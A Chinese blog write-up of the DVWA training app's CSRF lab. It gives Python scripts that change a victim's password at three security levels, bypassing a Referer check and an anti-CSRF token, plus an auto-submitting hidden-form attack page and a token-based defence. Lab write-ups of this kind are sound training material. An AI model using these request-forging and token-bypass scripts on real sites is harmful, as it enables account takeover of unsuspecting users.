DVWA - CSRF (low, medium, high)

本文通过实例演示了如何针对不同安全级别的CSRF漏洞进行攻击,包括设置PHPSESSID和security参数进行基本攻击、通过Referer验证提高攻击难度及动态获取user_token实现高级攻击。
该文章已生成可运行项目,

low

设置一下cookie的PHPSESSID和security即可跨站请求

import requests

def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
    headers = {
        'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=low',
    }
    new_password = 'ac'
    url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password)
    res = requests.get(url, headers=headers)
    if 'Password Changed.' in res.content:
        print('Yes')
    else:
        print('No')


if __name__ == '__main__':
    main()

medium

查看源码,发现

// Checks to see where the request came from 
if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )

根据Referer验证请求来源,绕过思路:在HTTP请求头声明Referer。

import requests


def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
    headers = {
        'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=medium',
        'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/'
    }
    new_password = 'ac'
    url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password)
    res = requests.get(url, headers=headers)
    if 'Password Changed.' in res.content:
        print('Yes')
    else:
        print('No')


if __name__ == '__main__':
    main()

high

查看源码,发现多了动态user_token验证

// Check Anti-CSRF token 
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

绕过思路:在代码层面发跨站请求动态获取user_token,再发跨站请求修改密码。

import requests
import re


def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
    headers = {
        'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=high',
        'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/'       
    }
    res = requests.get(url, headers=headers)
    m = re.search(r"user_token' value='(.*?)'", res.content, re.M | re.S)
    if m:
        user_token = m.group(1)
        new_password = 'ac'
        url = '%s?password_new=%s&password_conf=%s&user_token=%s&Change=Change' % (url, new_password, new_password, user_token)
        res = requests.get(url, headers=headers)
        if 'Password Changed.' in res.content:
            print('Yes')
        else:
            print('No')
            print(res.content)


if __name__ == '__main__':
    main()

注:这3个实验要跨站,别一直都在本地同一个浏览器测试,这没意思。

本文章已经生成可运行项目
### DVWA CSRF 漏洞攻击实例 #### 准备工作 为了成功实施跨站请求伪造(CSRF)攻击,在DVWA环境中,需先设置好测试环境并调整安全级别至低以便于理解整个过程[^1]。 #### 攻击流程展示 假设存在一个用户修改密码的功能页面`change-password.php`。此功能未正确校验发起更改请求的源头是否合法,从而可能遭受CSRF攻击影响。 ##### 正常操作场景 当一名已认证用户访问该页面时会看到表单用于输入新旧密码组合提交给服务器处理: ```html <form action="password-change.php" method="POST"> Current password:<br> <input type="text" name="current_password"><br> New password:<br> <input type="text" name="new_password"><br> Confirm new password:<br> <input type="text" name="confirm_new_password"><br><br> <input type="submit" value="Change Password"> </form> ``` ##### 构造恶意链接或网页片段 攻击者创建含有隐藏表单自动提交逻辑的HTML代码,诱导受害者点击特定URL或者浏览嵌入了这段代码的网页: ```html <html> <body onload='document.getElementById("f").submit()'> <form id="f" action="http://target-site.com/password-change.php" method="POST"> <input type="hidden" name="current_password" value="any_value"/> <input type="hidden" name="new_password" value="attacker_chosen"/> <input type="hidden" name="confirm_new_password" value="attacker_chosen"/> </form> </body> </html> ``` 一旦受害者的浏览器加载上述内容,则会在不知情的情况下发送一条改变其账户密码的有效HTTP POST 请求到目标Web应用,即使这个动作并非由他们自己主动触发完成。 #### 防护措施建议 引入一次性令牌(Token),即在每次生成涉及敏感数据变更的操作界面时附加独一无二且难以预测的随机字符串作为额外参数传递,并服务端严格检验收到的数据里携带的token值与预期相符才能继续后续业务逻辑处理步骤[^2]。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值